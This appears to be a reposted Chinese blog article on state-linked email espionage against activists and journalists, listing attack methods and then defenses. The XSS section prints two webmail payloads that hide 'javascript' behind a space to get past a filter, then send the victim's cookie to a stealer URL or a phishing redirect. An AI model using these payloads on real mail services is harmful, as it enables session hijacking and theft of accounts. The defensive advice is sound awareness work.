防禦郵箱間諜



如果說中國走在網絡戰爭的前沿,你可能覺得胡扯。發動網絡戰爭並不復雜,一般有三種類型:攻擊基礎設施、竊取機密數據、癱瘓網絡服務。而本文,將重點談及中國竊取機密數據的郵箱情報攻擊,幾乎從來沒有哪個國家能 像中國因維穩不惜任何代價而秘密地監聽國內外的敏感人士。

對於電子郵箱攻擊,你注意到國外媒體批露的中國攻擊事件與日俱增,如本月9號,紐約時報記者聲稱他們的郵箱被攻擊而 Twitter上的敏感人士開始越來越多的抱怨。你可能會質疑,有何事實數據可證明他們的郵箱確被攻擊?這是一個好問題,因為他們無法跟踪攻擊來 源與防禦被攻擊,那麼,常見的攻擊手法是怎樣的?我們如何跟踪攻擊來源?又如何防禦郵箱間諜的攻擊?

一、你是局外人?還是受害者?

1月,Google向中國提出沒有審查機 制的G.cn,並聲稱有人試圖入侵中國維權人士的Gmail,14日,McAfee就IE 0day的分析,將此次大規模的竊取機密數據(知識產權)攻擊稱為極光行動。儘管Google事件餘波已去,我想說的是:極光行動為什麼沒有攻擊國內郵 箱? ——顯然!國內的郵箱具有過濾審查機制,這 可以解釋你的郵箱為何會丟信,更重要的是,一紙紅 頭文件可未經用戶許可洩露郵件數據,若有不從,以涉黃之名拔網線威脅。
普通的用戶會這樣認為:我不是敏感人士,我不會遭到電郵攻擊。這樣的想法很美好,讓我們談談"話語權"吧。在三皇五帝的古代,罵皇帝是要砍頭,而40年代末的建 國期,是紅色的革命語,時間回溯現在的極 權主義國家,一切已然不一樣了,儘管今天的新聞媒體仍在中宣部的約束之下,但互聯網是一次革命,這個開放的網絡空間,人人都是媒體,可在 Twitter報導新聞,可用Wordpress發出聲音,意識形態的大軍是無法擊潰互聯網。
你會不會遭到電郵攻擊?與你是不是敏感人士無關,而是視乎你在網絡空間的聲音、行為,以及現實生活中身份有關係。也不能說所有的電郵攻擊都與政府脫 不了乾系,更有那些充滿好奇心、樂於惡作劇的駭客。

二、攻擊手法

你的Yahoo郵箱沒有點擊任何鏈接,但攻擊者無需密碼便控制住你的郵箱,這是什麼回 事?你的Gmail密碼相當複雜,但為何收到密碼重置的郵件?你登陸網易郵箱,點開郵件即重定向登陸入口,但網址卻是真實的,這是為何?最後,來 自國外越來越多的電郵失竊的新聞越來越多,你仍質疑中國沒有能力侵入他國政要郵箱賬戶?

1、XSS釣魚

這種攻擊仍是目前最行之有效的方法,除了Gmail目前不存在XSS漏洞外,其它的Yahoo、Hotmail、網易、騰訊、搜狐、新浪等都存在 XSS漏洞。 XSS漏洞是啥?它的全稱是Cross-site scripting,即跨站攻擊,存在此漏洞的網站,能夠被惡意攻擊者劫持,它還派生了XSRF等等形式的利用,可謂Web木馬。
08年,國內的郵箱都存在HTML標籤跨站,漏洞都很弱智,比如<img src=javascript:alert()>插在郵件標題、郵件內容、郵件附件處即可彈出一個可愛的 alert。接下來,進步一點了,還是以HTML標籤為主,搞個數據包工具看哪個變量沒過濾、以及編碼轉換。 09年,又升級了,主要是國外的郵箱Gmail、Yahoo、Hotmail改以語法過濾,能利用的是CSS標籤跨站,Gmail非常狠,除了早期存在 Google Docs附件跨站攻擊,基本把惡意代碼過濾得慘不忍睹。 Yahoo在09年亦漏洞不斷,但很負責,隔三差五地不斷升級,而Hotmail令人失望,居然1day過了一年都不補。
騰訊圈了一批牛人,忘記是Ph4nt0m還 是80sec的,比其它的網易、搜狐、新浪的郵箱安全性好一點,搜狐與新浪最 爛,透露一下,它們其中一個仍存在字符集的跨站漏洞。那麼,XSS攻擊到底是怎樣的形式呢?用一個08年截獲的新浪的HTML標籤XSS漏洞說明,此漏洞 是失效了,這年頭基本沒人直接公開0day,都養家糊口來著。
<INPUT TYPE="IMAGE" SRC="jav ascript:x7s='var Then=new Date();Then.setTime(Then.getTime()+7200*1000);if(document.cookie. indexOf(\'Cookie1 =\') == -1){document.cookie=\'Cookie1=RAY;expires=\'+Then.toGMTString();window.parent.location.href=\'http://www.google.com /sina/index.php?url=\'+location.href+\'&c=\'+document.cookie.replace(/&/g,\'xxx\');}';eval(x7s)"); ">
此漏洞的形成在於新浪郵箱沒有過濾空格,即過濾了javascript,但稍變形為jav ascript,便使得其後的惡意代碼得以執行。這段代碼有兩個功能,獲取Cookie並延長有效時間,並用父窗口 windows.parent.location重定向至釣魚網站。完整的攻擊流程是,將上述XSS代碼插入至郵件內容,以HTML模式發送郵件至受害者 郵箱,受害者點開郵件時,會迅速轉向sina釣魚網站,而轉向過程中,因採用parent,轉向時,網址不會有變化,即不會顯示釣魚網址,而受害者在釣魚 網站輸入密碼提交之,釣魚網站截取密碼再轉回真實的郵箱,由於控制了Cookie,受害者因懷疑會再次點開那封攻擊郵件,但並不會再次跳轉,這令受害者產 生一種錯覺,它以為郵箱仍是安全的。

2、竊取Cookie

你可以理解為竊取會話。你有過很多這樣的經歷,使用賬戶登陸某個網站,如Youku.com,關閉瀏覽器,再次打開youku.com,則不需要輸 入密碼,這便是Cookie的作用。 為什麼會有Cookie呢?由於Http是無狀態協議,為了在各個會話傳遞信息,因而需要Cookie或Session來標記訪客者的狀態,這裡的 Session是瀏覽器的Cookie裡帶了一個Token來標記,而服務器取得Token檢查合性後便把服務器上存儲的對應狀態和瀏覽器綁定。總的意思 就是:我只要竊取你的Cookie並保持了Session不過期,便可無須密碼訪問你的電子郵箱內容。
如果你要查看自己的Cookie,給Firefox裝個HttpFox擴展即可,如下圖。

竊取Cookie很簡單,可將上面的Javascript稍加改裝即可:<INPUT TYPE="IMAGE" SRC="jav ascript:document.location='http://www.google.com/cookie/stealer.php? cookie='+document.cookie;">,然後在stealer.php寫個保存接收的Cookie記錄的代碼即可,如果你想讓 Session不過期,自己寫個工具搞惦,每隔30秒請求一次目的頁面。 09年,Yahoo就被一幫人折騰了很多郵箱,不知道修復了沒有,國內幾個郵箱也能被利用。

3、惡意軟件

即木馬、病毒、後門、間諜、鍵盤記錄器……這些軟件,最常見算是doc、pdf病毒了,好好的一個文檔,挾帶了木馬,雙擊一打開,你就完了。最容易 受到攻擊的是西藏人士、維權人士,然而,我不得不承認,這是一種非常陰險的手段,因為這毫無任何技術含量。這個攻擊流程是,xxx部門獲取經費收購或買斷 木馬軟件、捆綁軟件,一般外包給中國公司,然後這些公司的報價奇高,各省xxx部門買了後,按照說明書配置木馬上線,再用捆綁工具與可信的文件捆在一起, 再用Google挑目標,比如找到abc.com網站,將該網站電子郵箱地址都整理出來,再用郵箱批量群發器不管三七十一把這些病毒通通發過去,再泡上一 杯茶盯著木馬軟件等著目標上線。
這種沒有採用魚叉式攻擊所導致的後果是,買的木馬軟件、捆綁軟件很快就無效了,因為一頓亂發,被安全軟件給盯上或用戶舉報查殺掉了,這個例證就是最近的IE 0day及PDF 0day很快曝光,估計這前後都不到一年。而在前文,儘管中國沒有比美國更好的網絡戰爭實力,但是不差錢,他們不需要關注技術細節,只需要知道誰 有0day,誰會挖掘0day,然後招安,買斷一堆的0day,比如Discuz!、Wordpress、Firefox漏洞,照著教程去攻擊。
那麼如何防禦這種惡意附件的攻擊?當你再次在郵箱看見一堆的PDF、DOC、HTM壓縮包時,簡單的方法是,下載後不要打開,直接上傳至 Google Docs,要是顯示一片空白或無關的內容,不管三七二十一提交到VirusTotal網站上。

4、社會工程學

這個方法很簡單,先跟你套近乎下,然後東問問西問問獲得碎片信息,基本就是掘地三層把目標的信息全收集起來,完了後,評估一下你的弱點在哪裡,再從 弱點入手,這種攻擊通常是僱傭了職業黑客來完成,因為過程比較複雜。舉例子,攻擊者有目標的郵箱,然後放到Google搜索,看目標註冊了哪些網站,把這 些網站整理,逐個把這些網站入侵了並下載數據庫,從中找到目標的網站密碼,再用網站密碼試郵箱密碼,要是目標只用一個密碼,那麼他的郵箱就完了。
總體上來說,你在網絡上的信息越少,便能夠降低被入侵的威脅。但事實並不情人願,Web2.0的社交網絡流行,你註冊了Twitter,天天嘰嘰喳 喳,一不小心把家世、住址、約會全都洩露了,你註冊了豆瓣,天天左看右瞧還加了攻擊者為好友,結果,他就知道你上網習慣與興趣愛好,然後再用策略和你聊的 特別歡,某一天,他跟你講:我找到一個非常牛B的電影了,你在Verycd下載瞧瞧。你一看,還真不錯,真是你喜歡的。然後他又講,能不能幫我登陸下 Gmail下載個文件看看是啥內容?我網速比較慢,我發你登陸密碼。你聽了,這小忙是得幫的,馬上速度登陸對方的Gmail下載了壓縮包,結果打開壓縮包 的文檔發現啥都沒,到了第二天,你就很神奇地發現,哦哦~我的豆瓣、twitter全都登陸不了……
社會工程學攻擊永不過時,因為人人都有被利用的心理弱點,不管是好心、私心、同情心啥的,都無法避免這種攻擊。不過,這項攻擊最大的缺點是,很耗時 間,短則幾天,長則幾月。這項攻擊在敏感人士的社區很常見,如Forum、Google Groups等,那些攻擊者最常見的手法盜用可信賬戶發送病毒附件。

5、MIT中間人攻擊

以ARP攻擊為例,A訪問mail.sina.com,但攻擊者B通過ARP劫持,可以使得你訪問虛假的新浪釣魚網站,而非真實的新浪。這種劫持通 信的手法可適合不同的場合,如劫持ADSL線路,這需要紅頭文件請本地電信局協助的,然後修改你的數據包返回假的數據包,舉例而言,你想從QQ官方下載 QQ程序,攻擊者修改數據包把QQ程序的下載地址改成木馬地址,結果你就可以下載個木馬回去了。如果你的通信是明文,沒有採用SSL,攻擊者可以直接看到 你密碼。不過,我不太肯定,Gmail雖然採用了SSL,但用戶名與密碼卻在網址中出現,有公司宣稱能解開SSL,我現在仍然是半信半疑。
另外一種是hosts文件劫持,典型的例子是,某個傢伙在Twitter.com說:無法訪問youtube.com? Picasaweb?很簡單,修改hosts文件即可馬上訪問。你一聽,哇,這麼好,趕緊用記事本打開hosts文件,把對方提供的映射地址粘貼進去,再 重新打開youtube.com,哇,真神奇,打開了~~聰明的看客接下來知道會發生啥了。
對於ADSL線路劫持的手法,這種攻擊也是行之有效的。另外,我們也得對某些代理軟件保持警惕,天知道那些免費的socks5、vpn會幹出令人震 驚的事嗎?

6、暴力破解

有三種,web窮舉、smtp窮舉、雲窮舉。在多數的情況下,前兩種效率低下,且限制諸多,以Web Gmail為例,它有CAPTCHA限制、重複次數的限制,不過,我倒是碰到過一個Python版的窮舉工具,但速度很慢。至於smtp,如果服務器做了 限制的話,比如現在網易對溯雪暴力破解工具是免疫 的。雲窮舉,就我目前所知,我想這是最有效率的破解方法,已 有安全專家Electric Alchemy利用亞馬遜雲服務Amazon Ec2運行Elcomsoft工具暴力破解PGP ZIP檔案的例子。 憑藉雲計算的超級計算機,以及一個分佈式郵箱密碼破解工具,暴力破解的速度將更快速。不過,這並不切實際,因為破解的成本太高了,需要很多米米。
暴力破解,這個古老的方法在目前只能針對極少的主流電子郵箱,儘管如此,但它對那些自架設的電子郵局仍然有效,因為它們沒有CAPTCHA、重複嘗 試次數、服務器資源等限制。總的來說,暴力破解對本地的加密文件破解比較有效率,但對網絡郵箱賬戶的破解尚不能達到30%的成功率。

7、瀏覽器惡意腳本

上過流氓軟件的當吧?一旦打開IE,主頁被鎖定只能訪問某個流氓的網站,嗯,沒錯,瀏 覽器的腳本也能起到釣魚攻擊之用。比如IE的BHO(Browser Helper Object)劫持、Chrome、Firefox擴展釣魚。就目前而言Chrome、Firefox的擴展釣魚並不怎麼流行,這比較麻煩,攻擊者需寫一 個看似合法可信的擴展,並植入後門,還需要方法讓目標安裝,這費力不討好,但BHO容易多了,可以隱秘地安裝而不會有提示。要防禦這種攻擊很簡單,檢視你 的Firefox、chrome是否有陌生的擴展、插件,不要在第三方的網站安裝擴展。

8、內嵌登陸表單

這是社會工程學攻擊的一種變形。當你打開某郵件,其內容部分嵌入了登陸表單,具體就是,你會看到一個要求你輸入用戶名、密碼的登陸框。恰好RFA的 新聞《維 權人士郵箱和推特遭竊取、攻擊》公佈一張攻擊實例圖片,見下圖。

如果你的Gmail收到上述的威脅恫嚇郵件,不要擔心,請在郵件的右側點擊下拉菜單,選擇“這是網絡欺詐”,而Gmail將會稍後封鎖此攻擊者。普 通的用戶不要誤以為這是Gmail的安全漏洞,最簡單的方法,選中郵件內容查看源代碼,你可以發現並不存在惡意的Javascript腳本,而是HTML 標籤,你在源代碼找到Action位置,將其後的釣魚網站向Google舉報即可。
其它的Gmail用戶不需要擔心,這種內嵌表單釣魚方式是通殺Gmail、Hotmail、Yahoo、網易、騰訊、搜狐的郵箱,由於不存在惡意的 Javascript,可稱之良性HTML標籤利用。看到這類威脅恫嚇郵件,一是舉報釣魚郵件、釣魚網址,二是刪除該郵件,三是提醒你的朋友警惕。

三、防禦

安全不能100%保證,只能最大限度地降低威脅,更來源於用戶的安全意識。

1、防禦XSS

如果你使用的Firefox瀏覽器,可安裝NoScript擴展來屏蔽惡意的Javascript腳本。但你希望一勞 永逸的話,非常簡單,註冊一個私人Google Groups, 並設置Gmail的過濾器,所有郵件一律轉發至Google Groups。但如果也不喜歡註冊Google Groups,那麼你可以再註冊Yahoo、Hotmail郵箱,使用Yahoo收取Gmail,再用Hotmail收取Yahoo,在這過程中,特定的 XSS代碼會分崩離析。

2、防禦惡意軟件

.txt文本格式永遠是無害的(如果你的系統沒有被映像劫持)。儘管如此,但我們仍難 以避免地與.DOC、.PDF格式打交道,如果你使用的Gmail,那麼一律在線查看。而另一種可能是,你會收到RAR、7z等壓縮格式,而郵件內容也頗 具引誘性,那麼你下載之後,請右鍵解壓至單獨的文件夾,而你不認識發件人並有疑心時,永不要馬上打開,請上傳至Google Docs在線查看,或者提交到VirusTotal.com在 線查毒。最好也在郵箱的簽名行增加一行文字:我只接受.txt格式附件!其它格式附件的郵件一律刪除。

3、防禦身份盜竊

建議啟用數字簽名。它可以協助你確認簽名者的身份及數據完整性,甚至你發出的郵件,對 方能夠獲得確認,從而避免被第三方攻擊者的濫用。與此同時,雙方還可以明文約定,即在準確的時間範圍內容髮送郵件,如一般為每個星期日發送郵件,而未在此 時間範圍內的郵件而作廢。

4、防禦數據失竊

正如前文所提,你應該使用TrueCrypt加密附件。這款經典的加密工具備受讚譽,你應該保持經常 使用的習慣。

5、防禦身份洩密

你的密碼提示問題應該是模棱兩可,比如“天下有多少顆月亮?”。而在個人註冊信息處, 不要留下你真實家庭地址、身份證號、電話號碼、出生日期等信息,當你的郵箱被攻破,這些信息能夠證明你的身份。不要將這些信息設置為公開,而是保密,並阻 止在Google Profiles可見。

6、使用Chrome瀏覽器

在TippingPoint第三屆Pwn2Own黑客大會,Apple's Safari, Mozilla's Firefox和Microsoft's Internet Explorer 8全部陣亡,你應該接納黑客們的建議,使用Chrome瀏覽器,我不能保證Chrome會一直安全的,因為安全是個偽命題,就目前而言,Chrome是個 不錯的選擇。當然,下一屆的Pwn2Own王者可能會是Firefox,不管如何,IE不是個好選擇,因為中國的黑客正在折騰它。

7、使用Gmail

在我長達半年的測試,我仍然無法拿下Gmail,它太安全了,這使我鬱火,當然,我也 不能保證它也是最安全的,至少目前我沒有聽到Gmail存在安全漏洞的消息。

8、每月密碼老化

微軟聲稱,定期改密碼沒有用,只會浪費時間與金錢。 我反對這種說法,當然,他們的調查結果是針對美國企業。我的建議是,密碼請設置為12位,每月更改電子郵箱密碼。間諜與黑客不一樣,間諜才不會愚蠢地刪除 你的郵件並更改你的密碼,那不可能,他們會暗中的監視你的郵件來往情況,伺機獲得可起訴的把柄。

四、反跟踪

在你尚未成為他人的魚之前,先搞翻這位漁人。

1、阻止郵件中的媒體

如果你不想攻擊者獲取到你的IP地址、瀏覽器、操作系統等信息,你應該阻止郵件中圖片顯示。這是為什麼?顯示圖片則意味著你訪問了該圖片的服務器, 而該服務器則記錄了你的訪問數據。如果你已經安裝了IIS、Apache,那麼你可以打開http://localhost,再去查看它們的日誌信息,看 看到底有沒有記錄你的訪問信息。
而如果你沒有裝上IIS、Apache無法測試的話,你可以打開間諜豬:http://www.spypig.com/ 向自己的郵箱發送測試郵件。如果你使用的Gmail,那非常好,Gmail默認是阻止圖片顯示的。

2、跟踪發件人的來源

如果你用的Foxmail客戶端,那很簡單:郵件——郵件信息——原始信息,即可看到 發件人的IP地址。如果你使用的Gmail,你可以在郵件的右側點擊三角形的下拉框,選擇Show Original查看郵件頭,要是看的頭暈,可直接找"Received"那一行,將其後的IP地址放到www.myip.cn進行查詢,以確認發件人來自哪裡。

3、質詢

陌生人可能發送熱點事件的郵件,諸如玉樹地震死亡名單,維權人士名單,他試圖激起你的 好奇心以及人道主義、愛心等。你不應該馬上查看,而是澄清你的疑問,這份名單的出處來自哪裡?你為什麼擁有這份名單?你發送給我的理由是什麼?要是對方無 法消除你的疑問以及無回复,我建議你將這封郵件的附件下載,交提交到VirusTotal上報病毒。

4、搜索

搜索對方的郵箱地址,看看在互聯網是否有跡可尋。如果你使用Gmail,可在郵件中點 擊“Show details”看看此封郵件是否為群發郵件,如果是,直接回复所有人詢問:這封郵件帶有病毒嗎?

5、檢查過濾器

現在登陸你的Gmail,進入設置項,選擇“Filters” 標籤,檢查是否存可疑的郵箱地址,如果有,請迅速刪除,否則,你的郵件全被偷了。

五、反思

從陸戰、水戰、空戰、網戰、太空戰,全球各國都在試圖提升各個空間作戰實力,顯然,在 網戰這塊,中國是大小通吃,吃完之後還堅決反對沒吃。以Google事件為例,華爾街日報昨天的報導《谷歌攻 擊者獲得用戶識別軟件代碼》,提及攻擊者使用了谷歌工程師的工作站作為跳板,儘管我不能核實其真實性,但在《挑戰五毛黨》這篇分析文也提及 Google中國區被安插內鬼。接下來,北京政府將如何應對Google後續事件呢?吃?抑或沒吃呢?




本文轉自 可能吧

0 意見: